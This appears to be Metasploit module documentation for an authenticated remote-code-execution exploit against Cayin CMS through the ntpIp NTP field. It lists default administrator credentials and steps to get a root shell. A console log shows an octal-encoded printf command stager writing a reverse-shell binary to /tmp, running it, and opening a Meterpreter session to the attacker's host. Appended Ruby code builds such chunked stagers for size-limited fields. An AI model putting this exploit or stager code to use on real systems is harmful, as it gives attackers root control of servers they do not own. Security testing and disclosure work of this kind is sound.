## Vulnerable Application

This module exploits an authenticated RCE in Cayin CMS <= 11.0. The injected command is executed through the `ntpIp` parameter of `system_service.cgi`.
The field is limited in size, so the payload is delivered across repeated requests, each appending a chunk to a file on the target, until the full payload is staged.
Cayin CMS-SE is built for Ubuntu 16.04 (20.04 failed to install correctly), so the environment should be fairly fixed and not vary much between targets.
Exploitation results in root-level access.

In the CMS-SE UI there are several options for the NTP server:

1. Test (this runs the injected command three times; it is still exploitable, but the append-based staging used here would not survive the repetition, so a strategy that tolerates it, such as fetching the payload with `wget`, would be required)
2. Save (saves the data but does not run it)
3. Update (the option used by this exploit)

The default credentials for the system are administrator:admin, per the [Guide](http://onlinehelp.cayintech.com/cmsServer/MCS110EN-01/Web_Manager.html).

## Verification Steps

1. Install the application on Ubuntu 16.04
2. Start msfconsole
3. Do: `use exploits/linux/http/cayin_cms_ntp`
4. Do: `set rhosts [ip]`
5. Do: `run`
6. You should get a root shell.

## Options

## Scenarios

### Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04

```
[*] Processing cayin_cms.rb for ERB directives.
resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
resource (cayin_cms.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cayin_cms.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (cayin_cms.rb)> set lport 6666
lport => 6666
resource (cayin_cms.rb)> set verbose true
verbose => true
resource (cayin_cms.rb)> check
[+] Cayin CMS install detected
[*] 2.2.2.2:80 - The service is running, but could not be validated.
resource (cayin_cms.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:6666
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
[*] Command Stager progress - 26.60% done (199/748 bytes)
[*] Command Stager progress - 53.07% done (397/748 bytes)
[*] Command Stager progress - 79.81% done (597/748 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
[*] Command Stager progress - 100.00% done (748/748 bytes)
meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer     : CMS-SE
OS           : Ubuntu 16.04 (Linux 4.4.0-179-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
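The chunked delivery shown in the log above, written out as an added example. This is not code from the Metasploit module or from Cayin; it reproduces the idea of the `printf` command stager only: a binary payload is octal-escaped, sliced so that each shell command fits a size-limited field, appended piece by piece to a file on the target, and finally made executable and run. The field limit (200 characters) and the file path `/tmp/stage` are placeholders; the page only says the field is limited in size and does not give the real limit. Building the HTTP request to `system_service.cgi` (including the administrator:admin login and the `ntpIp` parameter) is left to the module and is not shown here.

```ruby
# Added example: a minimal printf-based command stager of the kind the
# console log shows. Not part of the Metasploit module or of Cayin CMS.

# Assumed field limit. The page says only that the field is size-limited;
# 200 is a placeholder for this example, not the real ntpIp limit.
FIELD_LIMIT = 200

# Encode bytes as printf octal escapes (\177\105\114\106 ...), the same
# encoding visible in the log. Every byte is escaped, so nothing that the
# shell or printf could interpret reaches the single-quoted string.
def octal_escape(bytes)
  bytes.each_byte.map { |b| "\\#{b.to_s(8)}" }.join
end

# Split +payload+ into shell commands of at most +limit+ characters that
# append to +path+ on the target. Bytes are added greedily: an escape is
# 2 to 4 characters wide, so chunk boundaries depend on the content, which
# is why the log's progress lines are not evenly spaced.
def build_stager(payload, path: '/tmp/stage', limit: FIELD_LIMIT)
  prefix = "printf '"
  suffix = "'>>#{path}"
  cmds = []
  cur = +''
  payload.each_byte do |b|
    esc = "\\#{b.to_s(8)}"
    if prefix.size + cur.size + esc.size + suffix.size > limit
      raise ArgumentError, 'limit too small for a single byte' if cur.empty?

      cmds << prefix + cur + suffix
      cur = +''
    end
    cur << esc
  end
  cmds << prefix + cur + suffix unless cur.empty?

  # Mark executable and run, as the last command in the log does. Fold it
  # into the final printf when it still fits; otherwise send it on its own.
  trailer = " ; chmod +x #{path} ; #{path}"
  if !cmds.empty? && cmds.last.size + trailer.size <= limit
    cmds[-1] = cmds.last + trailer
  else
    cmds << trailer.sub(/\A ; /, '')
  end
  cmds
end

# Reverse the encoding: recover the bytes the stager would append. Used here
# to check the round trip locally, without a target shell.
def decode_stager(cmds)
  cmds.map { |c| c[/printf '([^']*)'/, 1].to_s }
      .join
      .scan(/\\([0-7]{1,3})/)
      .map { |o| o[0].to_i(8).chr }
      .join
      .b
end

if $PROGRAM_NAME == __FILE__
  # Constructed payload: an ELF-looking header followed by every byte value.
  sample = "\x7fELF\x01\x01\x01\x00".b + (0..255).map(&:chr).join.b
  build_stager(sample).each { |c| puts c }
end
```

Each returned string is one value to submit in the size-limited field, in order; `decode_stager` exists only so the slicing can be verified offline. Note the greedy packing: because a byte such as 0x00 costs two characters and 0xff costs four, the number of requests depends on the payload, not just its length.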